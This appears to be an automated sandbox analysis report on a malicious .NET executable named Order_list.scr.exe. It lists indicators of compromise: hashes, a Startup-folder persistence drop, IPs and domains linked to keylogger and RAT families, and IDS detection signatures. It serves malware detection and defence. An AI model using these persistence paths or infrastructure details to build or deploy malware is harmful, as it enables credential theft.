Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Order_list.scr.exe
Detection:	MAL
Classification:	mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 253 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 20.3.187.198, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Order_list.scr.exe, PID 3584 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6260 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:12:02	API Interceptor	13x Sleep call for process: powershell.exe modified
04:12:04	API Interceptor	3x Sleep call for process: svchost.exe modified
04:12:05	API Interceptor	7587892x Sleep call for process: Order_list.scr.exe modified
04:12:19	API Interceptor	6571089x Sleep call for process: 00.exe modified
09:12:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.64.1	gem2.exe	Get hash	malicious	Unknown	Browse	securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/0pqe/
	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/
132.226.247.73	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
checkip.dyndns.com	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
CLOUDFLARENETUS	invnoIL438805.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	g6.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://communication.investecprivatebank.co.za/Marketing/DocFusion/Headers/PBHeaderBanner.jpg	Get hash	malicious	Unknown	Browse	104.21.96.1
	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	g3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	1001-13.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	24010-KAPSON.exe	Get hash	malicious	Azorult, GuLoader	Browse	104.21.32.1
	https://file2-cdn.creality.com/file/2e068bd90e233501c8036fb25c76e092/CrealityScan_win_3.3.4-20241030.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	g4.elf	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Loader.exe	Get hash	malicious	Unknown	Browse	104.21.64.1
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3107641597418067
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrh:KooCEYhgYEL0In
MD5:	51CDBACD3BCB25B6BDBC9FF440DB5957
SHA1:	FAC93578F86DFB3185A64F28F791C37AB158D956
SHA-256:	648C46777F9A118EAAE868C2B3BAD7B45A33A2FAE39732CBDE4E129FA28316B1
SHA-512:	BF91228E9E932D073E8E5B4F0FFCDB8D00A5563ED8E0CE2D37EEB855CD34F8EC49181FCD0AF95D4A4AD28D2634725EC4B22ED01C2E3507A93D833F3F8A3DC20E
Malicious:	false
Reputation:	low
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe8f6cbbb, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42215424521884115
Encrypted:	false
SSDEEP:	1536:/SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:/azag03A2UrzJDO
MD5:	8766168C36197809C87E59FD844DDEDF
SHA1:	80CE8136C8830C98750C3326AA94722A43936C30
SHA-256:	548057DAC7345E74A0A1728308C371258C9F91354681C0B5FE486221A26B95B9
SHA-512:	C9B4B57FCC2FC1F580E5706E9DD1C02AD8EA52DC3F1D645D5EC03673EB31F2430EF6AEEE06F8FFE8F324D70DB63D6153CEACAB333497BAEB281B8959C4FE8595
Malicious:	false
Preview:	...... .......Y.......X\...;...{......................n.%..........}m......}..h.#..........}m.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{.....................................@.....}m..........................}m..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07829208661062691
Encrypted:	false
SSDEEP:	3:JmtOetYeW1qqljlt/ajq4RIjK7qJRIlNljlt/ollOE/tlnl+/rTc:YtrzAp5Xgq7K7dXApMP
MD5:	F0134AA702F3C31A71C0D390713F56A2
SHA1:	39E815C7B46FE3134F1AE01CE12A45D6CF2AE2DF
SHA-256:	CA5312F6543E1CCF410D61C0DA5E057A4F00AAAFC9FC01BD12DDE84D5E325D9B
SHA-512:	ED7DF2F8E44008DBF8A20755D60F54A1CBCF4D2931B1F2BAB0A2E86F4E944B8ED533EB1A3EDDE66CC19B10F87CFD8293765E77CC364765A96F6D2DC818793F88
Malicious:	false
Preview:	...r.....................................;...{.......}.......}m..............}m......}m..........}O..........................}m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.370777891441471
Encrypted:	false
SSDEEP:	24:3vQWWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R8UHrx:YWWSU4y4RQmFoUeWmfmZ9tlNWR8Wt
MD5:	93C80849E27DDE20CCB9753F5E77CFEF
SHA1:	D804D9BDD6F298E64F1CF6FD9CB6B4B47BB93C48
SHA-256:	A0DD3BB5A627248AC2FCBF8BB234C769E5D33230B92DE9FCD1AB6E39AE4815F1
SHA-512:	250FBCD5905FF70E5CB723E6CF23CF19F7C64F55D7F22A05A54248F34E07A4C825680C0C905FF45DF60998CB7DA84B3E5342B105EEF613EBBCA569F03B63B84E
Malicious:	false
Preview:	@...e.................................f..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10eah0zx.ydh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wamnlfk.cxk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkvxvzhj.u5i.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r22yn3xp.vuy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	829952
Entropy (8bit):	7.006820171417697
Encrypted:	false
SSDEEP:	12288:9aMaSzOKy2r7SPN/Mvy6URfiMCF9vEgAPdeaikpipP:MMaSSKy2/SPN/GBUIabdea4
MD5:	F614CD44A2CA0676523D3F9D23AE23B2
SHA1:	C5656616F7095E6B19C995B2528C984234D8E3ED
SHA-256:	B37E686FD31A86E8ACE7BAC6A862B1388241527AF590A168C294801CFBECD5B1
SHA-512:	E063B7B06D685C2244157AE397CD1D083860478CEC387C852DA40FC3B472E6B540649EA9399E3CDF867925C772FC0ABDEA43FF832B506C73B3D5487D6638C8B6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.............>.... ........@.. ....................................@....................................K.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........H...........D...d...........................................&.(......".......".(.....Vs....(....t.........v..}.....(......(....&.(.....f.r...p.r...p.(2...(3......N.s4...}.....(.....j.(5.....(6....s....(7....N.s4...}.....(.....N.s4...}.....(......(.........N.s4...}.....(.....F.~....(X....a...6.~.....(Y...F.~....(X....a...6.~.....(Y...F.~....(X....a...6.~.....(Y...F.~....(X........J.~..........(Z...F.~....(X....a...6.~.....(Y...*F.~....(X......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.006820171417697
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Order_list.scr.exe
File size:	829'952 bytes
MD5:	f614cd44a2ca0676523d3f9d23ae23b2
SHA1:	c5656616f7095e6b19c995b2528c984234d8e3ed
SHA256:	b37e686fd31a86e8ace7bac6a862b1388241527af590a168c294801cfbecd5b1
SHA512:	e063b7b06d685c2244157ae397cd1d083860478cec387c852da40fc3b472e6b540649ea9399e3cdf867925c772fc0abdea43ff832b506c73b3d5487d6638c8b6
SSDEEP:	12288:9aMaSzOKy2r7SPN/Mvy6URfiMCF9vEgAPdeaikpipP:MMaSSKy2/SPN/GBUIabdea4
TLSH:	2D054B453A7048F8C6338AF6B8E7827C6A71B95161E2C83A65CF1E5C7CC9B4046D726F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.............>.... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4cbe3e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcbdf0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcc000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xce000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc9e44	0xca000	2e9ce57a457972aa90df0397e494effa	False	0.4369476620513614	data	7.01381456901877	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xcc000	0x586	0x600	023f933e236ce25e662698bcb26c192d	False	0.4134114583333333	data	4.009208314844858	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xce000	0xc	0x200	46624f1790fa280a74b3c91e5b9e9686	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xcc0a0	0x2fc	data			0.43455497382198954
RT_MANIFEST	0xcc39c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T10:12:05.613559+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	132.226.247.73	80	TCP
2025-01-13T10:12:06.535491+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	132.226.247.73	80	TCP
2025-01-13T10:12:07.123853+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49734	104.21.64.1	443	TCP
2025-01-13T10:12:07.973199+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49736	132.226.247.73	80	TCP
2025-01-13T10:12:08.548593+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	104.21.64.1	443	TCP
2025-01-13T10:12:09.858094+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49739	104.21.64.1	443	TCP
2025-01-13T10:12:12.501706+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49745	104.21.64.1	443	TCP
